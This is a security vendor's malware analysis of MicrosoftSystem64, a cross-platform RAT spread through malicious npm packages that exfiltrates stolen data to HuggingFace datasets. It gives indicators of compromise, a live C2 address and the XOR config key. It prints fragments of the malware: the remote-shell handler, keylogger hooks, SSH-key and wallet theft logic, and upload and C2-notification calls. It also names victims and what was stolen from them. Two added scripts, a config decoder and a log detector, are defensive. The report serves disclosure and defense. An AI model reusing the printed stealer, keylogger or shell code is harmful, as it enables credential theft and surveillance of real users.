Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace

SafeDep Team

TL;DR

In early April 2026, a malicious npm package called js-logger-pack began evolving through 29 versions on the registry, progressing from a harmless probe into a full WebSocket stealer and eventually a binary dropper. SafeDep’s analysis on April 15 first documented this evolution and identified its second-stage payload: a binary called MicrosoftSystem64. A week later, JFrog Research independently reported the same campaign, highlighting its novel abuse of HuggingFace as a data exfiltration channel. Despite both disclosures, the threat remains fully active over six weeks later: our live infrastructure probe on May 28 confirmed the embedded HuggingFace token was still valid, the C2 server was accepting connections, and real victims were under active surveillance. The token has since been reported to HuggingFace for revocation.

MicrosoftSystem64 itself is an 81 MB stripped ELF binary (with Windows and macOS variants) that packages a full-featured info-stealer and remote access trojan (RAT) inside a Node.js v20.18.2 Single Executable Application (SEA). It connects to a WebSocket C2 at 195[.]201[.]194[.]107:8010, accepts 24 distinct remote commands, and exfiltrates stolen data to attacker-controlled HuggingFace datasets. It self-updates from a HuggingFace model repository, establishes persistence on all three major operating systems, and targets over 80 cryptocurrency wallet browser extensions, every Chromium and Firefox browser variant, Telegram Desktop sessions, SSH keys, and the system clipboard. It includes a cross-platform keylogger using native OS APIs (Windows SetWindowsHookEx, macOS CGEventTap, Linux xinput/evdev) and captures periodic screenshots uploaded to HuggingFace. This post provides a deep binary-level analysis of the payload’s full capabilities. The current analyzed version is 1.0.8.

Impact:

  • Exfiltration of credentials from 15 browser families (Chrome, Edge, Brave, Firefox, Opera, Vivaldi, Safari, Yandex, Chromium, CocCoc, CentBrowser, Opera GX, Chrome Beta, Chrome Canary, Edge Beta).
  • Theft of 80+ cryptocurrency wallet browser extension data including local storage, extension code, and wallet files.
  • Telegram Desktop session hijacking via tdata folder compression and upload.
  • SSH key exfiltration (id_rsa, id_ed25519, id_ecdsa, known_hosts, authorized_keys).
  • Cross-platform keylogger with clipboard monitoring (1 second polling interval).
  • Periodic screenshot capture and upload to HuggingFace (60 second interval).
  • Remote command execution with shell access on all platforms.
  • Self-updating binary with 24-hour check interval from HuggingFace.
  • Persistence via Windows Scheduled Tasks, macOS LaunchAgents, Linux systemd user units and XDG autostart.

Indicators of Compromise (IoC):

Indicator | Value
--- | ---
Binary name | MicrosoftSystem64 (Linux), MicrosoftSystem64.exe (Windows), MicrosoftSystem64-darwin-x64 / MicrosoftSystem64-darwin-arm64 (macOS)
SHA-256 (Linux ELF) | b2954c945b51dbd6fa88ac72338b7fbf76dec7d9909ceada9d36b21330842c97
File size | 85,134,080 bytes (81 MB)
Binary version | 1.0.8
Node.js version | v20.18.2 (statically linked SEA)
C2 server | 195[.]201[.]194[.]107:8010 (WebSocket + HTTP), Hetzner Online GmbH, DE, AS24940
HuggingFace binary host | hxxps://huggingface[.]co/jpeek998/system-releases/resolve/main
HuggingFace exfil account | jpeek998 (encrypted in binary config)
HuggingFace token (encrypted) | MlohU84sIc82dTpY/CgE3jdOOWD1OwnyDXYRds4bG+cUeBRH7w==
XOR encryption key | [90, 60, 126, 18, 159, 75, 109, 138]
Persistence unit name | MicrosoftSystem64 (systemd service, LaunchAgent label com.launchkeeper.MicrosoftSystem64, Windows scheduled task)
Install directory | ~/.local/share/MicrosoftSystem64 (Linux), ~/Library/Application Support/MicrosoftSystem64 (macOS), %LOCALAPPDATA%\MicrosoftSystem64 (Windows)
Registration marker | .registered file with ISO timestamp in install directory
Related npm package | js-logger-pack (v1.1.22+ acts as dropper)
Related HuggingFace repo | Lordplay/system-releases (earlier binary hosting)

Analysis

Binary Structure: Node.js SEA as an Evasion Vector

The binary is an 81 MB stripped ELF 64-bit x86-64 executable, dynamically linked against libdl, libstdc++, libm, libgcc_s, libpthread, and libc. Despite looking like a native Linux binary to file type checks, it is a Node.js Single Executable Application (SEA) built on Node.js v20.18.2. The SEA format bundles the full V8 engine, Node.js runtime, OpenSSL, and the malicious JavaScript into a single distributable binary.

$ file MicrosoftSystem64
MicrosoftSystem64: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=60ce51fbda3036749b0de656005abae18f2b3572,
for GNU/Linux 3.2.0, stripped

This packaging strategy gives the attacker several advantages: the payload runs without requiring Node.js on the victim machine, the JavaScript source is embedded within megabytes of V8 runtime strings making static analysis harder, and the binary presents as a native executable to endpoint monitoring tools rather than a suspicious node process. The process.title is set to MicrosoftSystem64, so process listings show a plausible-looking Microsoft service name.

Configuration and Encryption

The embedded JavaScript is bundled from dist/config.js and uses a simple XOR cipher to obfuscate hardcoded configuration values. The decryption function and key are present in cleartext:

dist/config.js
var _K = [90, 60, 126, 18, 159, 75, 109, 138];
function _d(enc) {
  const buf = Buffer.from(enc, 'base64');
  const out = [];
  for (let i = 0; i < buf.length; i++) {
    out.push(buf[i] ^ _K[i % _K.length]);
  }
  return Buffer.from(out).toString('utf8');
}

The configuration block stores XOR-encrypted values alongside cleartext comments that reveal the plaintext, making deobfuscation trivial:

var _CFG = {
  // ws://195.201.194.107:8010
  WS: 'LU9EPbB6VL90Dk4jsXpUvnQNTiWlc127ag==',
  // http://195.201.194.107:8010
  HTTP: 'MkgKYqVkQrtjCVAgr3pDu2MIUCOvfFeyag1O',
  // 15000
  HB: 'awlOPKg=',
  // https://huggingface.co/jpeek998/system-releases/resolve/main
  BIN_URL: 'MkgKYuxxQqUySRl19iUK7DtfGzz8JELgKlkbeaZyVaUpRQ1m+iZA+D9QG3PsLh6lKFkNffM9CKU3XRd8',
  // 1.0.7
  BIN_VER: 'axJOPKg=',
  // jpeek998
  HF_USER: 'MEwbd/RyVLI=',
  // hf_AQgL...DjUp (redacted; token was live at time of analysis)
  HF_TOKEN: 'MlohU84sIc82dTpY/CgE3jdOOWD1OwnyDXYRds4bG+cUeBRH7w==',
};

The decoded configuration establishes: the C2 WebSocket endpoint at ws://195[.]201[.]194[.]107:8010, a heartbeat interval of 15 seconds, a HuggingFace model repository at jpeek998/system-releases for binary updates, and a HuggingFace API token for authenticated dataset uploads. The attacker left the plaintext in comments during development and never cleaned them from the production build.
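
Because the cipher is a repeating 8-byte XOR, one known plaintext prefix is enough to recover the key, which matters when a later build rotates `_K`. The following is an added example, not code from the sample or from SafeDep: it recovers the key from BIN_URL using the assumed crib `https://`, cross-checks it against the WS field, and decodes the remaining values. Function names are illustrative and HF_TOKEN is intentionally not included.

```javascript
// Added analyst example, not code from the sample. Ciphertexts are copied from
// the _CFG block above; function names and the "https://" crib are assumptions.

const KEY_LEN = 8; // the sample's _K array has 8 entries

// HF_TOKEN is deliberately left out: triage does not need the credential.
const SAMPLE_CFG = {
  WS: 'LU9EPbB6VL90Dk4jsXpUvnQNTiWlc127ag==',
  BIN_URL:
    'MkgKYuxxQqUySRl19iUK7DtfGzz8JELgKlkbeaZyVaUpRQ1m+iZA+D9QG3PsLh6lKFkNffM9CKU3XRd8',
  BIN_VER: 'axJOPKg=',
  HF_USER: 'MEwbd/RyVLI=',
};

// key[i] = ciphertext[i] XOR plaintext[i], so a crib that covers one full key
// period reveals the whole key.
function recoverKey(encB64, crib, keyLen = KEY_LEN) {
  const ct = Buffer.from(encB64, 'base64');
  const pt = Buffer.from(crib, 'utf8');
  if (ct.length < keyLen || pt.length < keyLen) {
    throw new Error(`need at least ${keyLen} bytes of ciphertext and crib`);
  }
  return Array.from({ length: keyLen }, (_, i) => ct[i] ^ pt[i]);
}

function xorDecode(encB64, key) {
  const ct = Buffer.from(encB64, 'base64');
  const out = Buffer.alloc(ct.length);
  for (let i = 0; i < ct.length; i++) out[i] = ct[i] ^ key[i % key.length];
  return out.toString('utf8');
}

// Recover the key from one field, decode every field with it, and cross-check
// the result: a correct key must turn WS into a ws:// or wss:// URL.
function decodeConfig(cfg, cribField = 'BIN_URL', crib = 'https://') {
  const key = recoverKey(cfg[cribField], crib);
  const fields = {};
  for (const [name, enc] of Object.entries(cfg)) {
    fields[name] = xorDecode(enc, key);
  }
  const valid = /^wss?:\/\/[\x21-\x7e]+$/.test(String(fields.WS));
  return { key, fields, valid };
}

// Defang the scheme and host of a URL before it goes into a ticket or report.
function defang(text) {
  const m = /^(\w+):\/\/([^/]+)(.*)$/.exec(text);
  if (!m) return text;
  const scheme = m[1].replace(/^http/, 'hxxp');
  return `${scheme}://${m[2].replace(/\./g, '[.]')}${m[3]}`;
}

function report(cfg) {
  const { key, fields, valid } = decodeConfig(cfg);
  const lines = [`key: [${key.join(', ')}] (cross-check ${valid ? 'ok' : 'FAILED'})`];
  for (const [name, value] of Object.entries(fields)) {
    lines.push(`${name}: ${defang(value)}`);
  }
  return lines.join('\n');
}

console.log(report(SAMPLE_CFG));
```
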

C2 Communication Architecture

The agent connects to the C2 server over WebSocket with automatic reconnection using exponential backoff (1 second minimum, 10 second maximum, 500 ms jitter). On connection, it sends a heartbeat message containing a unique agentId derived from the victim’s platform, username, and machine identifier:

const rawAgentId = `${platformLabel}_${username || 'user'}_${machineId}`;

The heartbeat fires every 15 seconds (configured via HB). On reconnection, the agent resumes any pending uploads that failed during previous sessions, providing resilience against network disruptions.

Command and Control: 24 Remote Tasks

The binary accepts 24 distinct task types from the C2 operator, making it a full remote access trojan:

Task type | Capability
--- | ---
scan_wallets | Enumerate and exfiltrate all crypto wallet browser extensions and standalone wallet apps
scan_files | Scan filesystem for files matching attacker-specified patterns
send_tdata | Compress and upload Telegram Desktop session data
download_ssh | Exfiltrate SSH keys directory
exec_command | Execute arbitrary shell commands (PowerShell on Windows, /bin/sh on Unix)
list_dir | Directory listing
list_drives | Enumerate mounted drives/volumes
get_system_info | Collect OS, CPU, RAM, network, and user details
get_folder_size / get_multi_folder_size / get_multi_item_size | Reconnaissance of file sizes
start_input_capture / stop_input_capture / get_input_events | Cross-platform keylogger with clipboard capture
start_screenshot_stream / stop_screenshot_stream / set_screenshot_stream_quality | Real-time screenshot streaming to C2
start_screenshot_hf_upload / stop_screenshot_hf_upload / capture_screenshot_hf | Periodic screenshot upload to HuggingFace (60 second intervals)
clipboard_get / clipboard_set / get_clipboard | Read and write system clipboard
upload_folder_hf / upload_batch_hf | Upload arbitrary directories to HuggingFace datasets

The exec_command handler is a full remote shell. On Windows it spawns powershell.exe -NoProfile -NonInteractive -Command, on Linux/macOS it uses /bin/sh -c. It supports configurable timeouts (default 60 seconds), working directory, and shell toggle:

async function handleExecCommand(task) {
  const timeout = task.timeout ?? 6e4;
  const useShell = task.shell ?? true;
  const cwd = task.cwd ? resolvePath(task.cwd) : process.cwd();
  // ...
  if (isWindows) {
    child = spawn('powershell.exe', ['-NoProfile', '-NonInteractive', '-Command', task.command], { cwd /* ... */ });
  } else {
    child = spawn('/bin/sh', ['-c', task.command], { cwd /* ... */ });
  }
}

Data Exfiltration via HuggingFace

The most distinctive feature of this payload is its abuse of HuggingFace as a data exfiltration backend, documented by JFrog Research. Rather than uploading stolen data directly to the C2 server (which would require significant bandwidth and storage infrastructure), the agent creates private HuggingFace datasets under the attacker’s account and commits stolen files using the HuggingFace Git LFS commit API:

var HF_API_BASE = 'https://huggingface.co/api';
var HF_SCREEN_TOKEN = _d(_CFG.HF_TOKEN);
var HF_SCREEN_USERNAME = _d(_CFG.HF_USER);
async function createCommit(commitUrl, accessToken, summary, operations) {
  // Creates a Git LFS commit to a HuggingFace dataset
  const authHeaders = { Authorization: `Bearer ${accessToken}` };
  // ...
}

Each victim’s data is organized into separate datasets named from the agentId and the data type (e.g., scan_wallets, scan_files, ssh_keys). The agent first ensures the dataset exists via the HuggingFace API, then uploads gzipped archives as commits. After each upload, it notifies the C2 server with metadata about the upload:

async function notifyServer(uploadId, datasetName, fileName, agentId, folderPath) {
  // POST to C2 with upload metadata so the operator knows which
  // HuggingFace dataset to check
  body: JSON.stringify({ uploadId, datasetName, fileName, agentId, folderPath });
}

This architecture offloads storage to HuggingFace’s infrastructure, making the exfiltration harder to detect (HTTPS traffic to a legitimate ML platform) and cheaper for the attacker to operate. The C2 server only receives lightweight notification messages while HuggingFace stores the actual stolen data.

The current binary uses the HuggingFace account jpeek998, a pivot from the earlier Lordplay account used for binary hosting in the first dropper versions.

Browser Credential Theft

The _scanBrowserProfiles function systematically targets 15 browser families across all three operating systems. On Windows it searches %LOCALAPPDATA% and %APPDATA%, on macOS ~/Library/Application Support, and on Linux ~/.config:

Windows targets: Chrome, Chrome Beta, Chrome Canary, Edge, Edge Beta, Brave, Opera, Opera GX, Vivaldi, Yandex, Chromium, CocCoc, CentBrowser, Firefox

macOS targets: the same families plus Safari

Linux targets: Same Chromium variants plus Firefox under ~/.mozilla

For each browser, the agent copies browser history files and scans for wallet extensions by matching extension directory IDs. The browser process is killed first to release database locks:

async function killBrowserProcesses() {
  // Kills chrome, brave, firefox, edge, opera, vivaldi processes
  // to unlock credential databases
}

Crypto Wallet Extension Theft: 80+ Extensions

The binary contains a hardcoded mapping of over 80 Chromium browser extension IDs to wallet names. For each installed extension found in any browser profile, it copies both the extension code directory and its localStorage data:

// Partial list of 80+ wallet extension IDs embedded in the binary
nkbihfbeogaeaoehlefnkodbefgpgknn: "MetaMask",
bfnaelmomeimhlpmgjnjophhpkkoljpa: "Phantom",
dmkamcknogkgcdfhhbddcghachkejeap: "Keplr",
egjidjbpglichdcondbcbdnbeeppgdph: "Trust Wallet",
hnfanknocfeofbddgcijnmhnfnkdnaad: "Coinbase Wallet",
bhhhlbepdkbapadjdcoopfcalgecefil: "Solflare",
aholpfdialjgjfhomihkjbmgjidlcdno: "Exodus Extension",
ibnejdfjmmkpcnlpebklmnkoeoihofec: "TronLink",
mcohilncbfahbmgdjkbpemcciiolgcge: "OKX Wallet",
klghhnkeealcohjjanjjdaeeggmfmlpl: "Zerion",
fhbohimaelbohpjbbldcngcnapndodjp: "Binance Wallet (W3W)",
acmacodkjbdgmoleebolmdjonilkdbch: "Rabby",
fijngjgcjhjmmpcmkeiomlglpeiijkld: "Talisman",
aflkmfhebedbjioipglgcbcmnbpgliof: "Backpack",
fcfcfllfndlomdhbehjjcoimbgofdnhj: "Magic Eden Wallet",
// ... 65+ more extensions

The complete list spans major chains: Ethereum (MetaMask, Rabby, Zerion, Rainbow), Solana (Phantom, Solflare, Backpack, Glow), Bitcoin (UniSat, Ordinals, Xverse), Cosmos (Keplr, Leap, Cosmostation), Aptos (Petra, Pontem, Martian), Sui (Ethos, Sui Wallet), Tezos (Temple), Polkadot (Polkadot.js, Talisman, SubWallet), Tron (TronLink), NEAR (Meteor, HERE), Stacks (Leather/Hiro), XRP (Crossmark), and multi-chain wallets (Trust, Coinbase, OKX, Exodus, Brave, Safe/Gnosis).

Each extension’s data is copied with a 100 MB per-file size cap and packed into a gzip archive for upload:

const MAX_WALLET_FILE_SIZE = 100 * 1024 * 1024;
async function copyWalletDir(src, dest, maxSize, maxDepth, depth = 0) {
  // Recursively copies wallet extension data up to maxDepth
  // Skips files larger than maxSize
}

Telegram Session Hijacking

The handleSendTdata function targets Telegram Desktop’s tdata directory, which contains session keys that allow full account takeover without credentials. The path resolution is OS-aware:

// macOS
tdataDir = path.join(os.homedir(), 'Library', 'Application Support', 'Telegram Desktop', 'tdata');
// Windows
tdataDir = path.join(appData, 'Telegram Desktop', 'tdata');

The tdata directory is compressed with gzip via packTdata() and uploaded to HuggingFace with the victim’s OS, IP address, and username as metadata:

async function uploadTdata(gzPath, operatingSystem, ipAddress, username) {
  // Uploads compressed tdata to a HuggingFace dataset
}

SSH Key Exfiltration

The download_ssh task exfiltrates the entire ~/.ssh directory, targeting:

('id_rsa', 'id_rsa.pub', 'id_ed25519', 'id_ed25519.pub', 'id_ecdsa', 'id_ecdsa.pub', 'known_hosts', 'authorized_keys');

Stolen SSH keys are packed and uploaded to a dedicated HuggingFace dataset named ssh_keys:

const datasetName = buildDatasetName(config.agentId, 'ssh_keys');
const archivePath = await packFolderToArchive(sshPath, task.uploadId);
await uploadToHF(archivePath, hfCfg, datasetName, fileName, task.uploadId, sshPath, config.agentId);

Cross-Platform Keylogger

The keylogger is implemented natively for each platform using OS-level input capture APIs:

Windows: Uses a low-level keyboard hook via SetWindowsHookEx (hook ID 13 = WH_KEYBOARD_LL) with GetAsyncKeyState for modifier detection. The hook is compiled and injected as an inline C# snippet executed through PowerShell:

[DllImport("user32.dll")]
private static extern IntPtr SetWindowsHookEx(int id, HookProc cb, IntPtr hMod, uint tid);
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);
// ...
hookId = SetWindowsHookEx(13, hookProc, IntPtr.Zero, 0);

macOS: Uses Core Graphics CGEventTap to create a session-level event tap that listens for keyDown events:

let mask: CGEventMask = (1 << CGEventType.keyDown.rawValue)
guard let tap = CGEvent.tapCreate(
    tap: .cgSessionEventTap, place: .headInsertEventTap,
    options: .listenOnly, eventsOfInterest: mask,
    callback: keyCallback, userInfo: nil) else { /* ... */ }
CGEvent.tapEnable(tap: tap, enable: true)

Linux: Attempts xinput test-xi2 --root first (X11 input extension), falling back to raw /dev/input evdev reading with a 24-byte input_event struct parser:

const INPUT_EVENT_SIZE = 24;
// Falls back to reading /dev/input/event* devices directly
while (offset + INPUT_EVENT_SIZE <= buf.length) {
  // Parse struct input_event { timeval, __u16 type, __u16 code, __s32 value }
}

The keylogger runs alongside a clipboard watcher that polls every second:

var CLIPBOARD_POLL_MS = 1e3; // 1 second
async function _startClipboardWatcher() {
  /* ... */
}

Screenshot Capture

The binary supports both on-demand and periodic screenshot capture across all platforms:

  • Windows: Uses PowerShell with System.Windows.Forms.Screen and System.Drawing for BitBlt-based screen capture, with a fast path fallback
  • macOS: Uses the native screencapture -x -C -t png command
  • Linux: Tries multiple screenshot tools: gnome-screenshot, scrot, or X11-based capture with display environment detection

Periodic screenshots upload to HuggingFace every 60 seconds when enabled:

function startPeriodicScreenshotUpload(hfConfig, intervalMs = 6e4) {
  // Captures and uploads a screenshot every 60 seconds
}

Persistence Mechanisms

The binary establishes persistence on all three operating systems using the UNIT_STEM value MicrosoftSystem64:

Windows:

  • Creates a scheduled task named \MicrosoftSystem64 via schtasks /create
  • Sets a Run registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run

macOS:

  • Creates a LaunchAgent plist at ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist
  • Loads via launchctl bootstrap

Linux:

  • Creates a systemd user service at ~/.config/systemd/user/MicrosoftSystem64.service
  • Enables via systemctl --user enable
  • Runs loginctl enable-linger for user-level persistence without login
  • Creates an XDG autostart desktop entry at ~/.config/autostart/MicrosoftSystem64.desktop

The install directory is ~/.local/share/MicrosoftSystem64 on Linux, with a .registered marker file containing an ISO timestamp written on first execution.

Self-Update Mechanism

The binary checks for updates every 24 hours from the HuggingFace repository:

var CHECK_INTERVAL_MS = 24 * 60 * 60 * 1e3; // 24 hours
function startSelfUpdateLoop() {
  setTimeout(() => checkAndUpdate().catch(() => {}), 6e4); // first check at 60s
  updateTimer = setInterval(() => {
    checkAndUpdate().catch(() => {});
  }, CHECK_INTERVAL_MS);
}

The update process fetches a version file from hxxps://huggingface[.]co/jpeek998/system-releases/resolve/main using the embedded HuggingFace token, compares it against the current BINARY_VERSION (“1.0.8”), and if a newer version is available, downloads the platform-specific binary and replaces the running executable. The current binary was built against version 1.0.7 in the config but reports as 1.0.8, suggesting the version was bumped after the config was encoded.

Upload Resilience

The agent includes a persistent upload queue that survives crashes and restarts. Failed uploads are saved to disk and retried on the next successful C2 connection:

async function resumePendingUploads(agentId) {
  // On reconnect, retries all uploads that failed during previous sessions
}

If the local archive file is missing on retry (e.g., cleaned by antivirus), the agent re-packs the folder from the original path before retrying.

Attacker Infrastructure: Live Probe (2026-05-28)

We probed the attacker’s HuggingFace infrastructure on May 28, 2026. The findings confirm the exfiltration pipeline is actively operating with real victims.

Account Status

The attacker operates two HuggingFace accounts:

Account | Created | Purpose | Status (May 28)
--- | --- | --- | ---
Lordplay | 2025-11-24 | Binary hosting (system-releases repo) | Account active, repo disabled by HuggingFace (file downloads return 401). 7 public “football pose detection” models used as cover.
jpeek998 | 2026-05-15 | Data exfiltration (private datasets) | Fully active. Display name “Jlob”, no public repos.

The Lordplay/system-releases repo metadata is still readable. It lists all four platform binaries (MicrosoftSystem64-linux at 85 MB, -win.exe at 67 MB, -darwin-x64 at 87 MB, -darwin-arm64 at 84 MB) and a version.txt, last modified May 18. HuggingFace disabled file access but did not remove the repo or the account.

The jpeek998 account was created on May 15, 13 days after the Lordplay repo was disabled, as a replacement exfiltration endpoint. The HuggingFace API token embedded in the binary (redacted; reported to HuggingFace for revocation) authenticated successfully as jpeek998 with read/write access to private datasets at the time of our probe.

Active Victim Data

Using the embedded token, we enumerated three private datasets under jpeek998 containing exfiltrated data from two active victims:

Dataset | Victim | Type | Files | Time range (UTC) | Size
--- | --- | --- | --- | --- | ---
jpeek998/linux_ubuntu_f083ccb52684 | Linux (Ubuntu) | Screenshots (base64 PNG in JSON) | 323 | May 27 23:51 to May 28 05:14 | ~167 MB
jpeek998/win_wulin_e8bc41d9aca8 | Windows (user wulin) | Screenshots (base64 PNG in JSON) | 94 | May 28 03:41 to May 28 05:14 | ~16 MB
jpeek998/win_wulin_e8bc41d9aca8_scan_files | Windows (user wulin) | Stolen credential files (gzip) | 1 | May 28 03:43 | 500 MB

The screenshots are captured every 60 seconds and uploaded as JSON files containing a screenshot key with base64-encoded PNG data. We downloaded and decoded all 417 screenshots from both datasets. The following images are actual exfiltrated screenshots recovered from the attacker’s HuggingFace datasets, shown here as evidence of the active surveillance operation.

The Linux victim’s desktop shows a crypto trading terminal (MT5 connected to Binance EUR/BTC), Python scripts, and Polymarket bot notifications:

[Image: Exfiltrated screenshot from the Linux victim showing a crypto trading terminal and Polymarket bot notifications, captured May 28 2026 at 01:51 UTC]

The Windows victim’s desktop shows ChatGPT, a JoinQuant algorithmic trading platform, and VS Code with multiple browser tabs open to cryptocurrency exchanges:

[Image: Exfiltrated screenshot from the Windows victim showing ChatGPT, cryptocurrency trading platforms, and VS Code, captured May 28 2026 at 03:44 UTC]

A later capture of the same Windows victim shows them browsing JoinQuant’s strategy backtesting interface with active trading algorithms:

[Image: Second exfiltrated screenshot from the Windows victim showing JoinQuant trading strategy backtesting, captured May 28 2026 at 04:30 UTC]

Both victims are cryptocurrency traders, which aligns with the payload’s focus on stealing wallet extensions and browser credentials. The attacker is watching their screens in near real-time while simultaneously exfiltrating their credential databases.

Stolen Data Contents

The 500 MB credential archive from the Windows victim (wulin) uses a custom binary packing format (not standard tar/zip). String extraction reveals 1,097 credential files stolen from the machine, organized by a numeric index with sanitized path names.

Data stolen from user wulin (C: drive):

  • SSH keys: id_rsa, id_rsa.pub, known_hosts, known_hosts.old
  • Chrome Login Data, Cookies, Web Data, History, Bookmarks (Default and Profile 2)
  • Edge Login Data, Cookies, Web Data, History
  • Chrome and Edge Local State files (contain DPAPI-encrypted master keys)
  • Claude Desktop app data (Claude-3p/Local State, Crashpad settings)
  • NVIDIA app embedded browser credentials
  • Various Electron app credential stores

Data stolen from user Nicolas (D: drive, second user profile or mapped drive):

  • WeChat (xwechat) session data, history, and web data across multiple profiles
  • HuaYoungBrowser (anti-detect browser) Login Data, Cookies, and History from multiple shop profiles (shop IDs 327099334275079, 331362951237637, 335250269933673, 335269886693379, 339596858634247)
  • Remote Desktop connection files (.rdp)
  • Todoist app credentials
  • Telegram data

The presence of HuaYoungBrowser shop profiles suggests the victim may be running an e-commerce operation with multiple store accounts. The stealer harvested credentials from every Chromium-based application on both user profiles across two drives.

Dataset Naming Convention

The agent constructs dataset names from the victim’s agentId (derived from platform_username_machineId) and the scan type:

jpeek998/{platform}_{username}_{machineIdHash} → screenshots
jpeek998/{platform}_{username}_{machineIdHash}_scan_files → credential files
jpeek998/{platform}_{username}_{machineIdHash}_scan_wallets → wallet data
jpeek998/{platform}_{username}_{machineIdHash}_ssh_keys → SSH keys

Each dataset is created as a private HuggingFace dataset via POST hxxps://huggingface[.]co/api/repos/create. Files are uploaded as Git LFS commits using NDJSON-formatted commit operations. After each upload, the agent notifies the C2 at hxxp://195[.]201[.]194[.]107:8010/api/validate/hf-upload-complete with upload metadata so the operator knows which dataset to pull.
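
One way to hunt for this pattern in TLS-inspecting proxy logs, as an added example rather than SafeDep's or the sample's code. The log layout, the `ML_HOSTS` allow-list, the macOS platform labels and the 12-hex-digit hash length (taken from the dataset names observed above) are assumptions; the sample log lines are constructed.

```javascript
// Added detection example, not from the sample. Assumed log layout:
// "<time> <source-host> <method> <url> <status>".

const C2_HOST = '195.201.194.107:8010';             // from the IoC table
const STAGING_OWNERS = new Set(['jpeek998', 'lordplay']);
const ML_HOSTS = new Set(['ml-train-01']);           // hypothetical allow-list

// {platform}_{username}_{machineIdHash}[_scan_files|_scan_wallets|_ssh_keys]
// "linux" and "win" appear on this page; the macOS labels are guesses.
const AGENT_DATASET =
  /^(linux|win|mac|macos|darwin)_(.+)_([0-9a-f]{12})(?:_(scan_files|scan_wallets|ssh_keys))?$/;

function classifyDataset(name) {
  const m = AGENT_DATASET.exec(name);
  if (!m) return null;
  // A name without a suffix is the screenshot dataset.
  return { platform: m[1], username: m[2], machineId: m[3], kind: m[4] || 'screenshots' };
}

function inspect(line) {
  const [time, host, method, rawUrl] = line.trim().split(/\s+/);
  let url;
  try { url = new URL(rawUrl); } catch { return []; }
  const seg = url.pathname.split('/').filter(Boolean);
  const rules = [];

  if (url.host === C2_HOST) {
    rules.push(url.pathname === '/api/validate/hf-upload-complete'
      ? 'c2_upload_notify' : 'c2_contact');
  }
  if (url.hostname === 'huggingface.co') {
    // Repo creation from a machine that has no business publishing datasets.
    if (method === 'POST' && url.pathname === '/api/repos/create' && !ML_HOSTS.has(host)) {
      rules.push('hf_repo_create_unexpected_host');
    }
    // /api/datasets/<owner>/<name>/... where <name> follows the agent scheme.
    if (seg[0] === 'api' && seg[1] === 'datasets' && seg.length >= 4) {
      const info = classifyDataset(seg[3]);
      if (info) rules.push(`agent_dataset:${info.kind}`);
    }
    // /<owner>/system-releases/resolve/main/<file>: binary staging or update.
    if (seg[1] === 'system-releases' && seg[2] === 'resolve' &&
        STAGING_OWNERS.has(seg[0].toLowerCase())) {
      rules.push('binary_staging_fetch');
    }
  }
  return rules.map((rule) => ({ time, host, rule }));
}

function scan(lines) {
  return lines.flatMap(inspect);
}

// Constructed sample: four malicious-looking requests, two benign ones.
const SAMPLE_LOG = [
  '2026-05-28T03:41:02Z dev-laptop-12 GET https://huggingface.co/jpeek998/system-releases/resolve/main/version.txt 200',
  '2026-05-28T03:41:30Z dev-laptop-12 POST https://huggingface.co/api/repos/create 200',
  '2026-05-28T03:43:10Z dev-laptop-12 POST https://huggingface.co/api/datasets/jpeek998/win_alice_0123456789ab_scan_files/commit/main 200',
  '2026-05-28T03:43:11Z dev-laptop-12 POST http://195.201.194.107:8010/api/validate/hf-upload-complete 200',
  '2026-05-28T03:50:00Z ml-train-01 POST https://huggingface.co/api/repos/create 200',
  '2026-05-28T03:51:00Z ml-train-01 POST https://huggingface.co/api/datasets/acme/imagenet_subset/commit/main 200',
];

for (const f of scan(SAMPLE_LOG)) console.log(`${f.time} ${f.host} ${f.rule}`);
```

The dataset-name rule works regardless of which HuggingFace account the operator rotates to, since it keys on the agent's naming scheme rather than the owner.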

Attribution: The toskypi / jpeek* Cluster

Cross-referencing the attacker identifiers embedded in this binary with public threat intelligence reveals a broader campaign spanning multiple npm packages, HuggingFace accounts, and at least three months of activity.

Identity Cluster

The SSH key comment bink@DESKTOP-N8JGD6T leaked in js-logger-pack v1.1.5 is the strongest forensic anchor. JFrog Research traced this to a GitHub identity ptc-bink and a web persona whisdev, with copilot-ai.whisdev.org serving as a secondary hostname on the same C2 IP (195[.]201[.]194[.]107). The npm publisher account jpeek868 (email [email protected]) declared toskypi as the package author, a name that appears independently in kmsec.uk’s Contagious Trader campaign report under the email [email protected].

The jpeek namespace rotates numerically: jpeek868, jpeek886, jpeek895 are all linked npm accounts sharing the same Lordplay/system-releases HuggingFace infrastructure for binary staging. Additional associated npm accounts include pvnd3540749 and yggedd817513.

Alias | Platform | Role
--- | --- | ---
jpeek868 / jpeek886 / jpeek895 | npm | Package publishers (rotated after takedowns)
toskypi ([email protected]) | npm author field | Persistent author identity across campaigns
Lordplay | HuggingFace | Binary staging (system-releases, disabled by HF)
jpeek998 (“Jlob”) | HuggingFace | Active exfiltration endpoint (created 2026-05-15)
whisdev / ptcbink | HuggingFace, GitHub | Linked persona, C2 hostname copilot-ai.whisdev.org
bink@DESKTOP-N8JGD6T | SSH key (leaked) | Attacker’s development machine
snipmaxi | Telegram | Linked handle

Attributed Malicious Packages

The same actor or closely coordinated group published at least seven malicious npm packages:

Package | Account | Date | Mechanism
--- | --- | --- | ---
polymarket-validator | toskypi | Feb 2026 | Exfil to sha256-validate-rpc.vercel[.]app
changelog-logger-utilities | toskypi | Mar 15, 2026 | Exfil to changelog[.]rest
js-logger-pack | jpeek868 / toskypi | Apr 1-20, 2026 | WebSocket stealer, then HF binary dropper
terminal-logger-utils | jpeek895 cluster | May 20-21, 2026 | RC4/XOR obfuscated MicrosoftSystem64 dropper
ts-logger-pack | linked | Apr 1 / May 20, 2026 | Dependency proxy to terminal-logger-utils
pretty-logger-utils | jpeek895 cluster | May 2026 | Same dropper infrastructure
pinno-loggers | jpeek895 cluster | May 2026 | Same dropper infrastructure

The February and March packages (polymarket-validator, changelog-logger-utilities) belong to the Contagious Trader campaign targeting cryptocurrency trading bot developers. The April pivot to js-logger-pack introduced the HuggingFace exfiltration channel. After npm took down js-logger-pack on April 22, the May packages (terminal-logger-utils and its dependents) continued distributing MicrosoftSystem64 under fresh accounts, demonstrating rapid account rotation and operational resilience.

Campaign Lineage

